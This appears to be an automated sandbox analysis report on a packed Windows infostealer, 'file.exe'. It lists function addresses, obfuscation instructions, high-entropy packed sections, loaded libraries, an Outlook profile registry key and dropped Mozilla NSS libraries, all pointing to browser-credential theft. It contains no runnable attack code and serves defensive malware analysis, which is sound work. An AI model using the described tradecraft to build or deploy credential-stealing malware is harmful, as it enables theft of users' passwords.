Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6BB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C65F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00305895	0_2_00305895
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002F60EA	0_2_002F60EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895	0_2_0041F895
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A940	0_2_0041A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040914D	0_2_0040914D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B95D	0_2_0040B95D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004159FC	0_2_004159FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0039FAA6	0_2_0039FAA6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002F4AF8	0_2_002F4AF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CBADA	0_2_003CBADA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0039136A	0_2_0039136A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D319	0_2_0040D319
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041739D	0_2_0041739D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412405	0_2_00412405
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00469408	0_2_00469408
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004074E1	0_2_004074E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00336519	0_2_00336519
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0031E548	0_2_0031E548
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409DEA	0_2_00409DEA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003F0DE0	0_2_003F0DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041DE4E	0_2_0041DE4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EE01	0_2_0040EE01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002D8667	0_2_002D8667
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005176AD	0_2_005176AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00413F29	0_2_00413F29
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004107E1	0_2_004107E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6535A0	0_2_6C6535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665440	0_2_6C665440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C545C	0_2_6C6C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C542B	0_2_6C6C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CAC00	0_2_6C6CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695C10	0_2_6C695C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2C10	0_2_6C6A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D4E0	0_2_6C65D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696CF0	0_2_6C696CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6664C0	0_2_6C6664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4D0	0_2_6C67D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B34A0	0_2_6C6B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC4A0	0_2_6C6BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FD00	0_2_6C66FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67ED10	0_2_6C67ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680512	0_2_6C680512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B85F0	0_2_6C6B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690DD0	0_2_6C690DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6E63	0_2_6C6C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C670	0_2_6C65C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2E4E	0_2_6C6A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674640	0_2_6C674640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679E50	0_2_6C679E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693E50	0_2_6C693E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9E30	0_2_6C6B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5600	0_2_6C6A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697E10	0_2_6C697E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C76E3	0_2_6C6C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BEF0	0_2_6C65BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FEF0	0_2_6C66FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4EA0	0_2_6C6B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE680	0_2_6C6BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675E90	0_2_6C675E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669F00	0_2_6C669F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697710	0_2_6C697710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65DFE0	0_2_6C65DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686FF0	0_2_6C686FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A77A0	0_2_6C6A77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69F070	0_2_6C69F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678850	0_2_6C678850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D850	0_2_6C67D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B820	0_2_6C69B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4820	0_2_6C6A4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C667810	0_2_6C667810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C0E0	0_2_6C67C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6958E0	0_2_6C6958E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C50C7	0_2_6C6C50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6860A0	0_2_6C6860A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D960	0_2_6C66D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB970	0_2_6C6AB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CB170	0_2_6C6CB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67A940	0_2_6C67A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C9A0	0_2_6C65C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D9B0	0_2_6C68D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695190	0_2_6C695190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2990	0_2_6C6B2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699A60	0_2_6C699A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C671AF0	0_2_6C671AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69E2F0	0_2_6C69E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698AC0	0_2_6C698AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6522A0	0_2_6C6522A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C684AA0	0_2_6C684AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66CAB0	0_2_6C66CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2AB0	0_2_6C6C2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CBA90	0_2_6C6CBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66C370	0_2_6C66C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C655340	0_2_6C655340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D320	0_2_6C69D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C53C8	0_2_6C6C53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F380	0_2_6C65F380

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6994D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 000445C0 appears 316 times

Source: file.exe, 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2287933038.000000006C8D5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: ewpmbeli ZLIB complexity 0.994860319164692

Source: file.exe, 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2038617483.0000000004A10000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6B7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00059600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00059600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00053720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00053720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\BKC4C635.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2277615108.000000001D2A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287518427.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287861966.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2277615108.000000001D2A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287518427.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287861966.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2277615108.000000001D2A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287518427.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287861966.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2277615108.000000001D2A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287518427.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287861966.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2277615108.000000001D2A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287518427.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287861966.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2277615108.000000001D2A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287518427.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2277615108.000000001D2A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287518427.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287861966.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2117243976.000000001D1A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109982792.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2131116172.000000001D19B000.00000004.00000020.00020000.00000000.sdmp, GDHIIIIEHCFIECAKFHJD.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2277615108.000000001D2A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287518427.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2277615108.000000001D2A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2287518427.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1884672 > 1048576

Source: file.exe

Static PE information: Raw size of ewpmbeli is bigger than: 0x100000 < 0x1a6000

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2287861966.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2287861966.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ewpmbeli:EW;oepkyuxn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ewpmbeli:EW;oepkyuxn:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00059860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00059860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1db9a1 should be: 0x1cc4db

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: ewpmbeli
Source: file.exe	Static PE information: section name: oepkyuxn
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00493048 push 0BFE5417h; mov dword ptr [esp], ebx	0_2_004930D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00493048 push 789CCA02h; mov dword ptr [esp], esp	0_2_004930F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0005B035 push ecx; ret	0_2_0005B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0050583F push 71B27747h; mov dword ptr [esp], ebp	0_2_00505866
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0050583F push 22A73D7Bh; mov dword ptr [esp], edx	0_2_0050588B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004900D5 push ecx; mov dword ptr [esp], 16A8AAEFh	0_2_004900F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004378DD push 13A22701h; mov dword ptr [esp], edi	0_2_00437F09
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00305895 push eax; mov dword ptr [esp], ebx	0_2_00305899
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00305895 push 5F9548DBh; mov dword ptr [esp], edi	0_2_003058E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00305895 push 7C8C5FF1h; mov dword ptr [esp], ebp	0_2_00305926
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00305895 push 61E4A5DCh; mov dword ptr [esp], ebx	0_2_00305963
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00305895 push 32E627BAh; mov dword ptr [esp], ecx	0_2_0030597E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00305895 push 77EC7E53h; mov dword ptr [esp], esp	0_2_00305986
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00305895 push edi; mov dword ptr [esp], 7D9F4972h	0_2_003059E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00305895 push edi; mov dword ptr [esp], eax	0_2_00305A4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004EB0F4 push 39CB9200h; mov dword ptr [esp], edx	0_2_004EB1C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002F60EA push 70C816D2h; mov dword ptr [esp], edx	0_2_002F6154
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002F60EA push ebp; mov dword ptr [esp], 763019A8h	0_2_002F619C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002F60EA push 3CD5C365h; mov dword ptr [esp], edx	0_2_002F61D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002F60EA push 0C9BE891h; mov dword ptr [esp], ecx	0_2_002F6201
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895 push 30BB1001h; mov dword ptr [esp], ebx	0_2_0041F89E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895 push 4FCA3D2Ah; mov dword ptr [esp], edx	0_2_0041F8B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895 push 0F52228Eh; mov dword ptr [esp], eax	0_2_0041F970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895 push ebp; mov dword ptr [esp], 0D767E43h	0_2_0041F974
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895 push edx; mov dword ptr [esp], edi	0_2_0041F9D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895 push ebx; mov dword ptr [esp], 6BB14BC0h	0_2_0041FA8C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895 push eax; mov dword ptr [esp], ebp	0_2_0041FAA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895 push edi; mov dword ptr [esp], ebx	0_2_0041FC23
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895 push ecx; mov dword ptr [esp], 18707C36h	0_2_0041FC9F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895 push 3CFC3965h; mov dword ptr [esp], ecx	0_2_0041FCB3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041F895 push 13346CCAh; mov dword ptr [esp], ebx	0_2_0041FCD8

Source: file.exe

Static PE information: section name: ewpmbeli entropy: 7.953891408050396

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
